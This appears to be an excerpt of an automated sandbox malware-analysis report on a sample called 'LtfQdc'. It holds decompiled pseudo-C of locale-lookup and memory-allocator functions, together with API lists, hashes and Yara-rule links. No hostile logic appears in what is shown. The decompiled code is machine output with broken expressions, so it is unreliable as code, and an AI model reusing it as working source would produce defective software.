0x00d1a318
0x00d1a318
0x00d1a328
0x00000000
0x00d1a328
0x00d1a2e6

APIs

Part of subcall function 00D155BA: GetLastError.KERNEL32(?,00000008,00D12B3A), ref: 00D155BE
Part of subcall function 00D155BA: SetLastError.KERNEL32(00000000,?), ref: 00D15660

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D1A349
IsValidCodePage.KERNEL32(00000000), ref: 00D1A392
IsValidLocale.KERNEL32(?,00000001), ref: 00D1A3A1
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D1A3E9
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D1A408

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 4a1a1f0b9eb0e401fa053aea81f4c4ed3b272b4624eddd37032da5ab3db0f9f1
Instruction ID: a9ad0312d9bceab59d4615c8f2bda40a3f87ee8b3e38436aaf3d0820786e0c09
Opcode Fuzzy Hash: 4a1a1f0b9eb0e401fa053aea81f4c4ed3b272b4624eddd37032da5ab3db0f9f1
Instruction Fuzzy Hash: 40516071A01205BFDB10DFA8EC45BEE77B8FF59700F18042AA525E7191EF7099848B72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF99E0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 364
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E00CF99E0(void* __ecx, signed int _a4) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v49;
				char _v52;
				char _v53;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed char _v69;
				signed int _v72;
				intOrPtr _v76;
				signed int _v77;
				signed int _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t129;
				signed int _t134;
				signed int _t136;
				signed int _t139;
				signed int* _t140;
				intOrPtr _t145;
				void* _t148;
				signed int _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				signed int _t163;
				unsigned int _t166;
				void* _t174;
				signed int _t179;
				signed int _t187;
				intOrPtr _t195;
				signed int* _t205;
				signed int _t206;
				signed int _t219;
				signed int _t228;
				signed char _t235;
				signed int _t237;
				void* _t262;
				signed int _t263;
				unsigned int _t264;
				signed int _t265;
				intOrPtr* _t267;
				signed int _t281;
				void* _t304;
				void* _t313;

				_t129 =  *0xd40014; // 0xfbddd969
				_v24 = _t129 ^ _t281;
				_t175 = L00CEB7B0(_t174, _t262);
				_t272 = _a4 << 3;
				if(_t272 == 0) {
					_t263 = 1;
				} else {
					_t263 = _t272;
				}
				_t264 = _t263 +  *((intOrPtr*)(_t175 + 0xc));
				if(_t264 < _t272) {
					L63:
					asm("int3");
					asm("ud2");
					goto L64;
				} else {
					_t134 =  *(_t175 + 2) & 0x000000ff;
					_v60 = _t264;
					if(_t134 == 2) {
						_t183 = 0x20;
						if(_t264 != 0) {
							asm("bsr ecx, edi");
							_t183 = 0x3f;
						}
						_t136 = 0x20 - _t183;
						_t137 = (_t264 >> ( *(0xd35a40 - _t183) & 0x000000ff) & 0x00000007) + _t136 * 8;
						asm("sbb eax, 0xffffffff");
						_t12 = _t137 + 0xd3580c; // 0x0
						_t272 =  *((_t264 >> ( *(0xd35a40 - _t183) & 0x000000ff) & 0x00000007) + _t136 * 8 + _t12) & 0x0000ffff;
					} else {
						if(_t134 != 1) {
							_t252 = 0x20;
							if(_t264 != 0) {
								asm("bsr edx, edi");
								_t252 = 0x3f;
							}
							_t163 = 0x20 - _t252;
							_t164 = (_t264 >> ( *(0xd35a40 - _t252) & 0x000000ff) & 0x00000007) + _t163 * 8;
							asm("sbb eax, 0xffffffff");
							_t18 = _t164 + 0xd3580c; // 0x0
							_t272 = (_t252 & 0xffffff00 | ( *((_t264 >> ( *(0xd35a40 - _t252) & 0x000000ff) & 0x00000007) + _t163 * 8 + _t18) & 0x0000ffff) - 0x00000076 > 0x00000000) & ( *(0xd35a44 + _t163 * 4) & _t264 & 0xffffff00 | _t264 - 0x00000041 >= 0x00000000) & 0x000000ff |  *((_t264 >> ( *(0xd35a40 - _t252) & 0x000000ff) & 0x00000007) + _t163 * 8 + _t18) & 0x0000ffff;
						} else {
							_t228 = _t264 - 0x101;
							_t166 = _t264;
							if(_t228 <= 0xfefe) {
								if(_t264 == 1) {
									_t235 = 0x20;
								} else {
									asm("bsr ecx, eax");
									_t235 = _t228 ^ 0x0000001f;
								}
								_t166 =  <  ? 1 <<  ~_t235 : 0xbadbb1 >> 2;
							}
							_t279 = 0x20;
							if(_t166 != 0) {
								asm("bsr esi, eax");
								_t279 = 0x3f;
							}
							_t257 = (_t166 >> ( *(0xd35a40 - _t279) & 0x000000ff) & 0x00000007) + (0x20 - _t279) * 8;
							asm("sbb edx, 0xffffffff");
							_t30 = _t257 + 0xd3580c; // 0x0
							_t272 = ((_t166 >> ( *(0xd35a40 - _t279) & 0x000000ff) & 0x00000007) + (0x00000020 - _t279) * 0x00000008 & 0xffffff00 | ( *((_t166 >> ( *(0xd35a40 - _t279) & 0x000000ff) & 0x00000007) + (0x20 - _t279) * 8 + _t30) & 0x0000ffff) - 0x00000076 > 0x00000000) & (_t166 & 0xffffff00 | _t166 - 0x00000041 >= 0x00000000) & 0x000000ff |  *((_t166 >> ( *(0xd35a40 - _t279) & 0x000000ff) & 0x00000007) + (0x20 - _t279) * 8 + _t30) & 0x0000ffff;
						}
					}
					_v49 = 0;
					_v56 = 0xffffffff;
					_t237 =  *_t175 & 0x000000ff;
					_v69 = _t237;
					if(_t237 == 2) {
						if(( *0xd43d89 & 1) != 0) {
							L00CD7BD0(_t175, _t313);
						}
					}
					_v68 = _t175;
					if( *((char*)(_t175 + 3)) == 0) {
						_t139 = _t175;
						_t175 = (_t272 & 0x0000ffff) << 5;
						goto L46;
					} else {
						_t151 =  *0xd43e38; // 0x0
						_t267 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t151 * 4)) + 0xa0));
						if(_t267 < 2) {
							_push( &_v56);
							_push(_t272 & 0x0000ffff);
							_t131 = E00CD9960(_t175);
							_t237 = _v77 & 0x000000ff;
							if(_t131 != 0) {
								L30:
								_t265 =  *((intOrPtr*)(_t175 + 0x10)) + _t131;
								if( *((char*)(_t175 + 6)) != 0) {
									if((_t131 & 0x00000fff) == 0) {
										_t175 = _t237;
										_t205 = (_t131 >> 0x00000009 & 0x00000ff8) + (_t131 & 0xffe00000) + 0x2000;
									} else {
										_t76 = _t131 - 4; // -4
										_t205 = _t76;
									}
									 *_t205 = 1;
								}
								if(_t237 == 2) {
									if( *((short*)((_t131 >> 0x15) + (_t131 >> 0x15) + 0xd42d24)) == 0xfffe) {
										_t272 = _t131 & 0xffe00000;
										_t237 = 3 << (_t131 >> 0x00000002 & 0x0000001e);
										_t131 = _t131 >> 0x00000005 & 0x0000fffc;
										asm("lock or [eax+esi+0x4000], edx");
									}
								}
								L35:
								E00CFE643(_t131, _t175, _v28 ^ _t281, _t237, _t265, _t272);
								return _t265;
							}
							L43:
							_t179 = _t272 & 0x0000ffff;
							L45:
							_t175 = _t179 << 5;
							_t139 = _v64;
							L46:
							_t272 = _t139 + _t175 + 0x48;
							_t91 = _t139 + 0x40; // 0x40
							_t264 = _t91;
							__imp__TryAcquireSRWLockExclusive(_t264);
							if(_t139 == 0) {
								L00CC8B90(_t139, _t264);
							}
							_t140 =  *_t272;
							_t187 =  *_t140;
							if(_t187 == 0) {
								L60:
								_t131 = L00CD87D0(_t272, _v72, 0, _v64, 0x4000,  &_v53);
								_v88 = _t131;
								if(_t131 == 0) {
									L64:
									__imp__ReleaseSRWLockExclusive(_t264);
									_t265 = 0;
									goto L35;
								}
								_t140 = (_v68 >> 0x00000009 & 0x00000fe0) + (_v68 & 0xffe00000) - (( *((_v68 >> 0x00000009 & 0x00000fe0) + (_v68 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
								_t175 = _v72;
								goto L55;
							} else {
								_v53 = 0;
								_t237 =  *_t187;
								_v68 = _t187;
								if(_t237 == 0) {
									_t206 = 0;
									L54:
									_t175 = _v72;
									 *_t140 = _t206;
									_t140[3] = _t140[3] & 0xffffc001 | _t140[3] + 0x00000002 & 0x00003ffe;
									L55:
									_t145 =  *((intOrPtr*)(_t175 + 0x117c)) +  *((intOrPtr*)(_t140[2] + 0xc));
									 *((intOrPtr*)(_t175 + 0x117c)) = _t145;
									_t195 =  *((intOrPtr*)(_t175 + 0x1180));
									_t146 =  >  ? _t195 : _t145;
									 *((intOrPtr*)(_t175 + 0x1180)) =  >  ? _t195 : _t145;
									__imp__ReleaseSRWLockExclusive(_t264);
									_t237 = _v77 & 0x000000ff;
									_t131 = _v72;
									goto L30;
								}
								_t272 = _t187;
								_v64 =  *((intOrPtr*)(_v72 + 0x48 + _t175 + 0xc));
								_t206 = _t237;
								asm("bswap ecx");
								_t175 = _t206 ^ _t187;
								if((_t206 ^ _t187) > 0x1fffff) {
									L62:
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x20], xmm0");
									_t264 =  &_v52;
									_t148 = E00CC88D0(_t264, "first", _t237, 0);
									_push(_t264);
									E00C90790(_t148);
									_t131 = E00CC8960(_v76, _t313);
									goto L63;
								}
								_t175 = _t206 & 0x001fc000;
								if((_t206 & 0x001fc000) == 0) {
									goto L62;
								}
								asm("prefetcht0 [ecx]");
								goto L54;
							}
						}
						 *((intOrPtr*)(_t267 + 8)) =  *((intOrPtr*)(_t267 + 8)) + 1;
						asm("adc dword [edi+0xc], 0x0");
						_t179 = _t272 & 0x0000ffff;
						_t304 =  *0xd42d20 - _t272; // 0x1f
						if(_t304 < 0) {
							 *((intOrPtr*)(_t267 + 0x28)) =  *((intOrPtr*)(_t267 + 0x28)) + 1;
							asm("adc dword [edi+0x2c], 0x0");
							 *((intOrPtr*)(_t267 + 0x18)) =  *((intOrPtr*)(_t267 + 0x18)) + 1;
							asm("adc dword [edi+0x1c], 0x0");
							goto L45;
						}
						_t154 =  *(_t267 + 0x58 + _t179 * 8);
						_v64 = _t272;
						if(_t154 == 0) {
							 *((intOrPtr*)(_t267 + 0x20)) =  *((intOrPtr*)(_t267 + 0x20)) + 1;
							asm("adc dword [edi+0x24], 0x0");
							 *((intOrPtr*)(_t267 + 0x18)) =  *((intOrPtr*)(_t267 + 0x18)) + 1;
							asm("adc dword [edi+0x1c], 0x0");
							E00CC85A0(_t267, _t179);
							_t154 =  *(_t267 + 0x58 + _t179 * 8);
							if(_t154 != 0) {
								L25:
								_t272 =  *(_t267 + 0x5e + _t179 * 8) & 0x0000ffff;
								_t237 = _t154;
								_t156 =  *_t154;
								if(_t156 == 0) {
									_t219 = 0;
									L29:
									 *((char*)(_t267 + 0x5c + _t179 * 8)) =  *((char*)(_t267 + 0x5c + _t179 * 8)) - 1;
									 *(_t267 + 0x58 + _t179 * 8) = _t219;
									_v56 = _t272;
									 *_t267 =  *_t267 - ( *(_t267 + 0x5e + _t179 * 8) & 0x0000ffff);
									_t175 = _v68;
									_t131 = _t237;
									_t237 = _v69 & 0x000000ff;
									_t272 = _v64;
									if(_t131 == 0) {
										goto L43;
									}
									goto L30;
								}
								_t219 = _t156;
								asm("bswap ecx");
								if((_t219 & 0x001fc000) == 0) {
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x20], xmm0");
									_t264 =  &_v48;
									_t158 = E00CC88D0(_t264, "first", _t156, 0);
									_push(_t264);
									E00C90790(_t158);
									E00CC8960(_t272, _t313);
									goto L60;
								}
								asm("prefetcht0 [ecx]");
								goto L29;
							}
							goto L45;
						}
						 *((intOrPtr*)(_t267 + 0x10)) =  *((intOrPtr*)(_t267 + 0x10)) + 1;
						asm("adc dword [edi+0x14], 0x0");
						goto L25;
					}
				}
			}

0x00cf99ef
0x00cf99f6
0x00cf99ff
0x00cf9a01
0x00cf9a06
0x00cf9c71
0x00cf9a0c
0x00cf9a0c
0x00cf9a0c
0x00cf9a0e
0x00cf9a13
0x00cf9ecd
0x00cf9ecd
0x00cf9ece
0x00000000
0x00cf9a19
0x00cf9a19
0x00cf9a20
0x00cf9a24
0x00cf9a58
0x00cf9a5f
0x00cf9a61
0x00cf9a64
0x00cf9a64
0x00cf9a67
0x00cf9a83
0x00cf9a89
0x00cf9a8c
0x00cf9a8c
0x00cf9a26
0x00cf9a29
0x00cf9a9e
0x00cf9aa5
0x00cf9aa7
0x00cf9aaa
0x00cf9aaa
0x00cf9abb
0x00cf9ac9
0x00cf9acf
0x00cf9ad2
0x00cf9aec
0x00cf9a2b
0x00cf9a2b
0x00cf9a31
0x00cf9a39
0x00cf9a42
0x00cf9af0
0x00cf9a48
0x00cf9a48
0x00cf9a4b
0x00cf9a4b
0x00cf9b0a
0x00cf9b0a
0x00cf9b12
0x00cf9b19
0x00cf9b1b
0x00cf9b1e
0x00cf9b1e
0x00cf9b3d
0x00cf9b43
0x00cf9b46
0x00cf9b60
0x00cf9b60
0x00cf9a29
0x00cf9b62
0x00cf9b67
0x00cf9b6f
0x00cf9b75
0x00cf9b79
0x00cf9c84
0x00cf9c8a
0x00cf9c8a
0x00cf9c84
0x00cf9b83
0x00cf9b87
0x00cf9c64
0x00cf9c69
0x00000000
0x00cf9b8d
0x00cf9b8d
0x00cf9b9c
0x00cf9ba5
0x00cf9cd6
0x00cf9cd7
0x00cf9cd8
0x00cf9cdd
0x00cf9ce4
0x00cf9c29
0x00cf9c2c
0x00cf9c32
0x00cf9c39
0x00cf9df4
0x00cf9e0b
0x00cf9c3f
0x00cf9c3f
0x00cf9c3f
0x00cf9c3f
0x00cf9c42
0x00cf9c42
0x00cf9c4b
0x00cf9ca2
0x00cf9ca6
0x00cf9cb9
0x00cf9cbe
0x00cf9cc3
0x00cf9cc3
0x00cf9ca2
0x00cf9c4d
0x00cf9c53
0x00cf9c61
0x00cf9c61
0x00cf9cea
0x00cf9cea
0x00cf9cff
0x00cf9cff
0x00cf9d02
0x00cf9d06
0x00cf9d09
0x00cf9d0c
0x00cf9d0c
0x00cf9d10
0x00cf9d18
0x00cf9d1c
0x00cf9d1c
0x00cf9d21
0x00cf9d23
0x00cf9d27
0x00cf9e45
0x00cf9e5b
0x00cf9e60
0x00cf9e66
0x00cf9ed0
0x00cf9ed1
0x00cf9ed7
0x00000000
0x00cf9ed7
0x00cf9e90
0x00cf9e95
0x00000000
0x00cf9d2d
0x00cf9d2d
0x00cf9d32
0x00cf9d36
0x00cf9d3a
0x00cf9d74
0x00cf9d76
0x00cf9d76
0x00cf9d7a
0x00cf9d90
0x00cf9d93
0x00cf9d9c
0x00cf9d9f
0x00cf9da5
0x00cf9dad
0x00cf9db0
0x00cf9db7
0x00cf9dbd
0x00cf9dc2
0x00000000
0x00cf9dc2
0x00cf9d3c
0x00cf9d49
0x00cf9d4d
0x00cf9d4f
0x00cf9d53
0x00cf9d5b
0x00cf9e9e
0x00cf9e9e
0x00cf9ea2
0x00cf9ea8
0x00cf9eb6
0x00cf9ebb
0x00cf9ebc
0x00cf9ec8
0x00000000
0x00cf9ec8
0x00cf9d63
0x00cf9d69
0x00000000
0x00000000
0x00cf9d6f
0x00000000
0x00cf9d6f
0x00cf9d27
0x00cf9bab
0x00cf9baf
0x00cf9bb3
0x00cf9bb6
0x00cf9bbd
0x00cf9cef
0x00cf9cf3
0x00cf9cf7
0x00cf9cfb
0x00000000
0x00cf9cfb
0x00cf9bc3
0x00cf9bc9
0x00cf9bcd
0x00cf9dcb
0x00cf9dcf
0x00cf9dd3
0x00cf9dd7
0x00cf9dde
0x00cf9de3
0x00cf9de9
0x00cf9bdb
0x00cf9bdb
0x00cf9be0
0x00cf9be2
0x00cf9be6
0x00cf9bfd
0x00cf9bff
0x00cf9bff
0x00cf9c03
0x00cf9c07
0x00cf9c10
0x00cf9c12
0x00cf9c16
0x00cf9c18
0x00cf9c1d
0x00cf9c23
0x00000000
0x00000000
0x00000000
0x00cf9c23
0x00cf9be8
0x00cf9bea
0x00cf9bf2
0x00cf9e18
0x00cf9e1c
0x00cf9e22
0x00cf9e30
0x00cf9e35
0x00cf9e36
0x00cf9e40
0x00000000
0x00cf9e40
0x00cf9bf8
0x00000000
0x00cf9bf8
0x00000000
0x00cf9def
0x00cf9bd3
0x00cf9bd7
0x00000000
0x00cf9bd7
0x00cf9b87

APIs

TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 00CF9D10
ReleaseSRWLockExclusive.KERNEL32(00000040), ref: 00CF9DB7
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CF9ED1

Strings

first, xrefs: 00CF9E2B, 00CF9EB1

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID: first
API String ID: 1021914862-2456940119
Opcode ID: 95a57186b2437051b74bd09f972ea81da11cd1d3a72aa448e4dcf93aec762565
Instruction ID: 78e696ed012384a9097d2cd100e8889612cb2dd39739510cb7e1476f007fc2a9
Opcode Fuzzy Hash: 95a57186b2437051b74bd09f972ea81da11cd1d3a72aa448e4dcf93aec762565
Instruction Fuzzy Hash: E7D144726047458BDB18CF29C89077AB7E2FFC4314F18862DEA928B385DB349D05DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CEA940 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 363
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E00CEA940(void* __ecx, signed int _a4) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v49;
				char _v52;
				char _v53;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed char _v69;
				signed int _v72;
				intOrPtr _v76;
				signed int _v77;
				signed int _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t129;
				signed int _t134;
				signed int _t136;
				signed int _t139;
				signed int* _t140;
				intOrPtr _t145;
				void* _t148;
				signed int _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				signed int _t163;
				unsigned int _t166;
				void* _t174;
				signed int _t179;
				signed int _t187;
				intOrPtr _t195;
				signed int* _t205;
				signed int _t206;
				signed int _t219;
				signed int _t228;
				signed char _t235;
				signed int _t237;
				void* _t262;
				signed int _t263;
				unsigned int _t264;
				signed int _t265;
				intOrPtr* _t267;
				signed int _t280;
				void* _t304;
				void* _t313;

				_t271 = _a4;
				_t129 =  *0xd40014; // 0xfbddd969
				_v24 = _t129 ^ _t280;
				_t175 = L00CEB7B0(_t174, _t262);
				if(_t271 == 0) {
					_t263 = 1;
				} else {
					_t263 = _t271;
				}
				_t264 = _t263 +  *((intOrPtr*)(_t175 + 0xc));
				if(_t264 < _t271) {
					L63:
					asm("int3");
					asm("ud2");
					goto L64;
				} else {
					_t134 =  *(_t175 + 2) & 0x000000ff;
					_v60 = _t264;
					if(_t134 == 2) {
						_t183 = 0x20;
						if(_t264 != 0) {
							asm("bsr ecx, edi");
							_t183 = 0x3f;
						}
						_t136 = 0x20 - _t183;
						_t137 = (_t264 >> ( *(0xd35a40 - _t183) & 0x000000ff) & 0x00000007) + _t136 * 8;
						asm("sbb eax, 0xffffffff");
						_t12 = _t137 + 0xd3580c; // 0x0
						_t271 =  *((_t264 >> ( *(0xd35a40 - _t183) & 0x000000ff) & 0x00000007) + _t136 * 8 + _t12) & 0x0000ffff;
					} else {
						if(_t134 != 1) {
							_t252 = 0x20;
							if(_t264 != 0) {
								asm("bsr edx, edi");
								_t252 = 0x3f;
							}
							_t163 = 0x20 - _t252;
							_t164 = (_t264 >> ( *(0xd35a40 - _t252) & 0x000000ff) & 0x00000007) + _t163 * 8;
							asm("sbb eax, 0xffffffff");
							_t18 = _t164 + 0xd3580c; // 0x0
							_t271 = (_t252 & 0xffffff00 | ( *((_t264 >> ( *(0xd35a40 - _t252) & 0x000000ff) & 0x00000007) + _t163 * 8 + _t18) & 0x0000ffff) - 0x00000076 > 0x00000000) & ( *(0xd35a44 + _t163 * 4) & _t264 & 0xffffff00 | _t264 - 0x00000041 >= 0x00000000) & 0x000000ff |  *((_t264 >> ( *(0xd35a40 - _t252) & 0x000000ff) & 0x00000007) + _t163 * 8 + _t18) & 0x0000ffff;
						} else {
							_t228 = _t264 - 0x101;
							_t166 = _t264;
							if(_t228 <= 0xfefe) {
								if(_t264 == 1) {
									_t235 = 0x20;
								} else {
									asm("bsr ecx, eax");
									_t235 = _t228 ^ 0x0000001f;
								}
								_t166 =  <  ? 1 <<  ~_t235 : 0xbadbb1 >> 2;
							}
							_t278 = 0x20;
							if(_t166 != 0) {
								asm("bsr esi, eax");
								_t278 = 0x3f;
							}
							_t257 = (_t166 >> ( *(0xd35a40 - _t278) & 0x000000ff) & 0x00000007) + (0x20 - _t278) * 8;
							asm("sbb edx, 0xffffffff");
							_t30 = _t257 + 0xd3580c; // 0x0
							_t271 = ((_t166 >> ( *(0xd35a40 - _t278) & 0x000000ff) & 0x00000007) + (0x00000020 - _t278) * 0x00000008 & 0xffffff00 | ( *((_t166 >> ( *(0xd35a40 - _t278) & 0x000000ff) & 0x00000007) + (0x20 - _t278) * 8 + _t30) & 0x0000ffff) - 0x00000076 > 0x00000000) & (_t166 & 0xffffff00 | _t166 - 0x00000041 >= 0x00000000) & 0x000000ff |  *((_t166 >> ( *(0xd35a40 - _t278) & 0x000000ff) & 0x00000007) + (0x20 - _t278) * 8 + _t30) & 0x0000ffff;
						}
					}
					_v49 = 0;
					_v56 = 0xffffffff;
					_t237 =  *_t175 & 0x000000ff;
					_v69 = _t237;
					if(_t237 == 2) {
						if(( *0xd43d89 & 1) != 0) {
							L00CD7BD0(_t175, _t313);
						}
					}
					_v68 = _t175;
					if( *((char*)(_t175 + 3)) == 0) {
						_t139 = _t175;
						_t175 = (_t271 & 0x0000ffff) << 5;
						goto L46;
					} else {
						_t151 =  *0xd43e38; // 0x0
						_t267 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t151 * 4)) + 0xa0));
						if(_t267 < 2) {
							_push( &_v56);
							_push(_t271 & 0x0000ffff);
							_t131 = E00CD9960(_t175);
							_t237 = _v77 & 0x000000ff;
							if(_t131 != 0) {
								L30:
								_t265 =  *((intOrPtr*)(_t175 + 0x10)) + _t131;
								if( *((char*)(_t175 + 6)) != 0) {
									if((_t131 & 0x00000fff) == 0) {
										_t175 = _t237;
										_t205 = (_t131 >> 0x00000009 & 0x00000ff8) + (_t131 & 0xffe00000) + 0x2000;
									} else {
										_t76 = _t131 - 4; // -4
										_t205 = _t76;
									}
									 *_t205 = 1;
								}
								if(_t237 == 2) {
									if( *((short*)((_t131 >> 0x15) + (_t131 >> 0x15) + 0xd42d24)) == 0xfffe) {
										_t271 = _t131 & 0xffe00000;
										_t237 = 3 << (_t131 >> 0x00000002 & 0x0000001e);
										_t131 = _t131 >> 0x00000005 & 0x0000fffc;
										asm("lock or [eax+esi+0x4000], edx");
									}
								}
								L35:
								E00CFE643(_t131, _t175, _v28 ^ _t280, _t237, _t265, _t271);
								return _t265;
							}
							L43:
							_t179 = _t271 & 0x0000ffff;
							L45:
							_t175 = _t179 << 5;
							_t139 = _v64;
							L46:
							_t271 = _t139 + _t175 + 0x48;
							_t91 = _t139 + 0x40; // 0x40
							_t264 = _t91;
							__imp__TryAcquireSRWLockExclusive(_t264);
							if(_t139 == 0) {
								L00CC8B90(_t139, _t264);
							}
							_t140 =  *_t271;
							_t187 =  *_t140;
							if(_t187 == 0) {
								L60:
								_t131 = L00CD87D0(_t271, _v72, 0, _v64, 0x4000,  &_v53);
								_v88 = _t131;
								if(_t131 == 0) {
									L64:
									__imp__ReleaseSRWLockExclusive(_t264);
									_t265 = 0;
									goto L35;
								}
								_t140 = (_v68 >> 0x00000009 & 0x00000fe0) + (_v68 & 0xffe00000) - (( *((_v68 >> 0x00000009 & 0x00000fe0) + (_v68 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
								_t175 = _v72;
								goto L55;
							} else {
								_v53 = 0;
								_t237 =  *_t187;
								_v68 = _t187;
								if(_t237 == 0) {
									_t206 = 0;
									L54:
									_t175 = _v72;
									 *_t140 = _t206;
									_t140[3] = _t140[3] & 0xffffc001 | _t140[3] + 0x00000002 & 0x00003ffe;
									L55:
									_t145 =  *((intOrPtr*)(_t175 + 0x117c)) +  *((intOrPtr*)(_t140[2] + 0xc));
									 *((intOrPtr*)(_t175 + 0x117c)) = _t145;
									_t195 =  *((intOrPtr*)(_t175 + 0x1180));
									_t146 =  >  ? _t195 : _t145;
									 *((intOrPtr*)(_t175 + 0x1180)) =  >  ? _t195 : _t145;
									__imp__ReleaseSRWLockExclusive(_t264);
									_t237 = _v77 & 0x000000ff;
									_t131 = _v72;
									goto L30;
								}
								_t271 = _t187;
								_v64 =  *((intOrPtr*)(_v72 + 0x48 + _t175 + 0xc));
								_t206 = _t237;
								asm("bswap ecx");
								_t175 = _t206 ^ _t187;
								if((_t206 ^ _t187) > 0x1fffff) {
									L62:
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x20], xmm0");
									_t264 =  &_v52;
									_t148 = E00CC88D0(_t264, "first", _t237, 0);
									_push(_t264);
									E00C90790(_t148);
									_t131 = E00CC8960(_v76, _t313);
									goto L63;
								}
								_t175 = _t206 & 0x001fc000;
								if((_t206 & 0x001fc000) == 0) {
									goto L62;
								}
								asm("prefetcht0 [ecx]");
								goto L54;
							}
						}
						 *((intOrPtr*)(_t267 + 8)) =  *((intOrPtr*)(_t267 + 8)) + 1;
						asm("adc dword [edi+0xc], 0x0");
						_t179 = _t271 & 0x0000ffff;
						_t304 =  *0xd42d20 - _t271; // 0x1f
						if(_t304 < 0) {
							 *((intOrPtr*)(_t267 + 0x28)) =  *((intOrPtr*)(_t267 + 0x28)) + 1;
							asm("adc dword [edi+0x2c], 0x0");
							 *((intOrPtr*)(_t267 + 0x18)) =  *((intOrPtr*)(_t267 + 0x18)) + 1;
							asm("adc dword [edi+0x1c], 0x0");
							goto L45;
						}
						_t154 =  *(_t267 + 0x58 + _t179 * 8);
						_v64 = _t271;
						if(_t154 == 0) {
							 *((intOrPtr*)(_t267 + 0x20)) =  *((intOrPtr*)(_t267 + 0x20)) + 1;
							asm("adc dword [edi+0x24], 0x0");
							 *((intOrPtr*)(_t267 + 0x18)) =  *((intOrPtr*)(_t267 + 0x18)) + 1;
							asm("adc dword [edi+0x1c], 0x0");
							E00CC85A0(_t267, _t179);
							_t154 =  *(_t267 + 0x58 + _t179 * 8);
							if(_t154 != 0) {
								L25:
								_t271 =  *(_t267 + 0x5e + _t179 * 8) & 0x0000ffff;
								_t237 = _t154;
								_t156 =  *_t154;
								if(_t156 == 0) {
									_t219 = 0;
									L29:
									 *((char*)(_t267 + 0x5c + _t179 * 8)) =  *((char*)(_t267 + 0x5c + _t179 * 8)) - 1;
									 *(_t267 + 0x58 + _t179 * 8) = _t219;
									_v56 = _t271;
									 *_t267 =  *_t267 - ( *(_t267 + 0x5e + _t179 * 8) & 0x0000ffff);
									_t175 = _v68;
									_t131 = _t237;
									_t237 = _v69 & 0x000000ff;
									_t271 = _v64;
									if(_t131 == 0) {
										goto L43;
									}
									goto L30;
								}
								_t219 = _t156;
								asm("bswap ecx");
								if((_t219 & 0x001fc000) == 0) {
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x20], xmm0");
									_t264 =  &_v48;
									_t158 = E00CC88D0(_t264, "first", _t156, 0);
									_push(_t264);
									E00C90790(_t158);
									E00CC8960(_t271, _t313);
									goto L60;
								}
								asm("prefetcht0 [ecx]");
								goto L29;
							}
							goto L45;
						}
